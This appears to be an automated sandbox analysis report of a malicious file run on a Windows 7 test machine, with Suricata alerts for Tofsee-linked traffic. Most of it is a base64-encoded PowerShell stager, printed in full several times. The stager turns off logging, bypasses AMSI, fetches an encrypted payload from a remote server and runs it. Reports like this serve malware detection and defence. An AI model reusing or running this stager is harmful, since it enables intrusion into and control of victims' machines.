Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 4, 2024, 5:05 p.m. | July 4, 2024, 5:08 p.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==
2184
-
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49169 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49170 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49171 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49172 -> 117.18.232.200:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 117.18.232.200:443 -> 192.168.56.102:49173 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
TCP 117.18.232.200:443 -> 192.168.56.102:49174 | 2029340 | ET INFO TLS Handshake Failure | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== |
cmdline | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0